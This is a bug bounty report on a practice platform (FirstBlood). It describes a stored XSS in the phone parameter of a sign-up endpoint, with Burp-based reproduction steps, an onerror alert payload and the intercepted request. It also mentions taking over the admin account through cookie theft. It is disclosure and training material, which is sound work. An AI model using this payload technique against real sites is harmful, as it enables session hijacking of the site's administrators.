FirstBlood-#1010Store xss on doctor admin dashboard
This issue was discovered on FirstBlood v3

On 2022-12-08, properlay Level 7 reported:

Hello, I found a store XSS vulnerability on doctor admin panel.

To reproduce:

  1. Visit

  2. When sign up the HackerBack event, Burp suite intercept ON

  3. Fill full name and phone number and click sing up

  4. On the intercept request, Change the parameter phone value to phone=1<img+src=x+onerror=alert(0)>

POST /api/hackerback.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

  1. Forward the request. The XSS will execute on admin dashboard.


Can takeover doctor admin account by stealing cookie.


FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.

Report Feedback


Creator & Administrator

Congratulations, you were the first user to discover this finding, great job!